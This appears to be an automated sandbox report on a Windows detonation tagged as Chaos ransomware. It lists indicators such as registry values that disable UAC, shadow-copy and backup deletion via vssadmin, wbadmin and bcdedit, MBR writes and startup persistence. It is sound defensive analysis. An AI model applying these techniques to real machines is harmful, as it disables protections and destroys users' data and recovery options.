Malware Analysis Report

2025-06-16 06:23

Sample ID 230913-ksfvwsag7s
Target http://google.com
Tags
chaos bootkit evasion persistence ransomware spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file http://google.com was found to be: Known bad.

Malicious Activity Summary

chaos bootkit evasion persistence ransomware spyware stealer trojan upx

Chaos

Chaos Ransomware

UAC bypass

Modifies boot configuration data using bcdedit

Deletes shadow copies

Downloads MZ/PE file

Disables Task Manager via registry modification

Deletes backup catalog

Drops startup file

Executes dropped EXE

Reads user/profile data of web browsers

UPX packed file

Checks computer location settings

Drops desktop.ini file(s)

Writes to the Master Boot Record (MBR)

Legitimate hosting services abused for malware hosting/C2

Sets desktop wallpaper using registry

Enumerates physical storage devices

Checks SCSI registry key(s)

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of FindShellTrayWindow

Runs net.exe

Runs ping.exe

NTFS ADS

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Delays execution with timeout.exe

Interacts with shadow copies

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

Modifies registry key

Kills process with taskkill

Modifies Internet Explorer settings

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-13 08:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-13 08:51

Reported

2023-09-13 09:00

Platform

win10v2004-20230831-en

Max time kernel

535s

Max time network

540s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.com

Signatures

Chaos

ransomware chaos

Chaos Ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\ScaryInstaller.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\ScaryInstaller.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\ScaryInstaller.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2415528079-3794552930-4264847036-1000\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\2315.tmp\mbr.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2atm621co.jpg" C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "140" C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupView = "0" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders C:\Windows\System32\rundll32.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000d22d16854fdcd90104b1910220e6d9014d78cb0320e6d90114000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874369" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874385" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 72003200acc001002d577d4720004d53303733357e312e5a49500000560009000400efbe2d577d472d577d472e00000000000000000000000000000000000000000000000000bf667f004d005300200030003700330035002e0036002b0037003400320031002e007a006900700000001c000000 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 431563.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
